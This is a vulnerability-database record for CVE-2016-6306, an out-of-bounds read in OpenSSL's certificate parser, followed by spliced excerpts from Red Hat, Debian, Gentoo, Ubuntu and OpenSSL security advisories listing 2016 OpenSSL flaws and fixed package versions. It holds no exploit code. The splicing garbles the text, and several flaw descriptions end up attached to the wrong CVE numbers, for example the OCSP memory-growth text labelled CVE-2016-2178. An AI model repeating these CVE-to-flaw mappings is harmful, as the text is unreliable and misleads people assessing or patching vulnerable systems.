"NVD", "id": "CVE-2016-6306", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-6306", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6306" }, { "db": "JVNDB", "id": "JVNDB-2016-004992" }, { "db": "NVD", "id": "CVE-2016-6306" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The certificate parser in OpenSSL before 1.0.1u and 1.0.2 before 1.0.2i might allow remote attackers to cause a denial of service (out-of-bounds read) via crafted certificate operations, related to s3_clnt.c and s3_srvr.c. Supplementary information : CWE Vulnerability type by CWE-125: Out-of-bounds Read ( Read out of bounds ) Has been identified. http://cwe.mitre.org/data/definitions/125.htmlService disruption through the manipulation of crafted certificates by third parties ( Read out of bounds ) There is a possibility of being put into a state. OpenSSL is prone to a local denial-of-service vulnerability. \nA local attacker can exploit this issue to cause a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:1940-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html\nIssue date: 2016-09-27\nCVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 \n CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 \n CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount of\nmemory and, possibly, exit unexpectedly after exhausting all available\nmemory, if it enabled OCSP stapling support. \n(CVE-2016-2178)\n\n* It was discovered that the Datagram TLS (DTLS) implementation could fail\nto release memory in certain cases. A malicious DTLS client could cause a\nDTLS server using OpenSSL to consume an excessive amount of memory and,\npossibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw\nto make a DTLS server using OpenSSL to reject further packets sent from a\nDTLS client over an established DTLS connection. (CVE-2016-2181)\n\n* An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec()\nfunction. (CVE-2016-2182)\n\n* A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL\nprotocol. A man-in-the-middle attacker could use this flaw to recover some\nplaintext data by capturing large amounts of encrypted traffic between\nTLS/SSL server and client if the communication used a DES/3DES based\nciphersuite. (CVE-2016-2183)\n\nThis update mitigates the CVE-2016-2183 issue by lowering priority of DES\ncipher suites so they are not preferred over cipher suites using AES. For\ncompatibility reasons, DES cipher suites remain enabled by default and\nincluded in the set of cipher suites identified by the HIGH cipher string. \nFuture updates may move them to MEDIUM or not enable them by default. \n\n* An integer underflow flaw leading to a buffer over-read was found in the\nway OpenSSL parsed TLS session tickets. (CVE-2016-6302)\n\n* Multiple integer overflow flaws were found in the way OpenSSL performed\npointer arithmetic. A remote attacker could possibly use these flaws to\ncause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)\n\n* An out of bounds read flaw was found in the way OpenSSL formatted Public\nKey Infrastructure Time-Stamp Protocol data for printing. An attacker could\npossibly cause an application using OpenSSL to crash if it printed time\nstamp data from the attacker. A remote attacker could\npossibly use these flaws to crash a TLS/SSL server or client using OpenSSL. \n(CVE-2016-6306)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304\nand CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()\n1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()\n1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer\n1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks\n1377594 - CVE-2016-6306 openssl: certificate message OOB reads\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2177\nhttps://access.redhat.com/security/cve/CVE-2016-2178\nhttps://access.redhat.com/security/cve/CVE-2016-2179\nhttps://access.redhat.com/security/cve/CVE-2016-2180\nhttps://access.redhat.com/security/cve/CVE-2016-2181\nhttps://access.redhat.com/security/cve/CVE-2016-2182\nhttps://access.redhat.com/security/cve/CVE-2016-6302\nhttps://access.redhat.com/security/cve/CVE-2016-6304\nhttps://access.redhat.com/security/cve/CVE-2016-6306\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://www.openssl.org/news/secadv/20160922.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI\nxpTW7ApBLmKhVjs49DGYouI=\n=4VgY\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. Additional information can be found at\n https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/ \n\nCVE-2016-2178\n\n Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing\n leak in the DSA code. \n\nCVE-2016-2179 / CVE-2016-2181\n\n Quan Luo and the OCAP audit team discovered denial of service\n vulnerabilities in DTLS. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1t-1+deb8u4. \n\nFor the unstable distribution (sid), these problems will be fixed soon. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201612-16\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 07, 2016\n Bugs: #581234, #585142, #585276, #591454, #592068, #592074,\n #592082, #594500, #595186\n ID: 201612-16\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\nallows attackers to conduct a time based side-channel attack. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.2j \u003e= 1.0.2j\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe CVE identifiers and the International Association for Cryptologic\nResearch\u0027s (IACR) paper, \"Make Sure DSA Signing Exponentiations Really\nare Constant-Time\" for further details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2j\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-2105\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105\n[ 2 ] CVE-2016-2106\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106\n[ 3 ] CVE-2016-2107\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107\n[ 4 ] CVE-2016-2108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108\n[ 5 ] CVE-2016-2109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109\n[ 6 ] CVE-2016-2176\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176\n[ 7 ] CVE-2016-2177\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177\n[ 8 ] CVE-2016-2178\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178\n[ 9 ] CVE-2016-2180\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180\n[ 10 ] CVE-2016-2183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183\n[ 11 ] CVE-2016-6304\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304\n[ 12 ] CVE-2016-6305\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305\n[ 13 ] CVE-2016-6306\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306\n[ 14 ] CVE-2016-7052\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052\n[ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time\n http://eprint.iacr.org/2016/594.pdf\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-16\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. ==========================================================================\nUbuntu Security Notice USN-3087-1\nSeptember 22, 2016\n\nopenssl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This\nissue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)\n\nQuan Luo discovered that OpenSSL did not properly restrict the lifetime\nof queue entries in the DTLS implementation. (CVE-2016-2181)\n\nShi Lei discovered that OpenSSL incorrectly validated division results. \n(CVE-2016-2182)\n\nKarthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES\nciphers were vulnerable to birthday attacks. \n(CVE-2016-2183)\n\nShi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)\n\nShi Lei discovered that OpenSSL incorrectly performed certain message\nlength checks. (CVE-2016-6306)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.4\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.20\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.37\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. Description:\n\nThis release adds the new Apache HTTP Server 2.4.29 packages that are part\nof the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer\nto the Release Notes for information on the most significant bug fixes,\nenhancements and component upgrades included in this release. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-373 - Errata for httpd 2.4.29 GA RHEL 7\n\n7. \nOpenSSL Security Advisory [22 Sep 2016]\n========================================\n\nOCSP Status Request extension unbounded memory growth (CVE-2016-6304)\n=====================================================================\n\nSeverity: High\n\nA malicious client can send an excessively large OCSP Status Request extension. \nIf that client continually requests renegotiation, sending a large OCSP Status\nRequest extension each time, then there will be unbounded memory growth on the\nserver. This will eventually lead to a Denial Of Service attack through memory\nexhaustion. Servers with a default configuration are vulnerable even if they do\nnot support OCSP. Builds using the \"no-ocsp\" build time option are not affected. \n\nServers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default\nconfiguration, instead only if an application explicitly enables OCSP stapling\nsupport. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nSSL_peek() hang on empty record (CVE-2016-6305)\n===============================================\n\nSeverity: Moderate\n\nOpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an\nempty record. This could be exploited by a malicious peer in a Denial Of Service\nattack. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSWEET32 Mitigation (CVE-2016-2183)\n==================================\n\nSeverity: Low\n\nSWEET32 (https://sweet32.info) is an attack on older block cipher algorithms\nthat use a block size of 64 bits. In mitigation for the SWEET32 attack DES based\nciphersuites have been moved from the HIGH cipherstring group to MEDIUM in\nOpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these\nciphersuites disabled by default. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 16th August 2016 by Karthikeyan\nBhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the\nOpenSSL development team. \n\nOOB write in MDC2_Update() (CVE-2016-6303)\n==========================================\n\nSeverity: Low\n\nAn overflow can occur in MDC2_Update() either if called directly or\nthrough the EVP_DigestUpdate() function using MDC2. If an attacker\nis able to supply very large amounts of input data after a previous\ncall to EVP_EncryptUpdate() with a partial block then a length check\ncan overflow resulting in a heap corruption. \n\nThe amount of data needed is comparable to SIZE_MAX which is impractical\non most platforms. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nMalformed SHA512 ticket DoS (CVE-2016-6302)\n===========================================\n\nSeverity: Low\n\nIf a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a\nDoS attack where a malformed ticket will result in an OOB read which will\nultimately crash. \n\nThe use of SHA512 in TLS session tickets is comparatively rare as it requires\na custom server callback and ticket lookup mechanism. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB write in BN_bn2dec() (CVE-2016-2182)\n========================================\n\nSeverity: Low\n\nThe function BN_bn2dec() does not check the return value of BN_div_word(). \nThis can cause an OOB write if an application uses this function with an\noverly large BIGNUM. This could be a problem if an overly large certificate\nor CRL is printed out from an untrusted source. TLS is not affected because\nrecord limits will reject an oversized certificate before it is 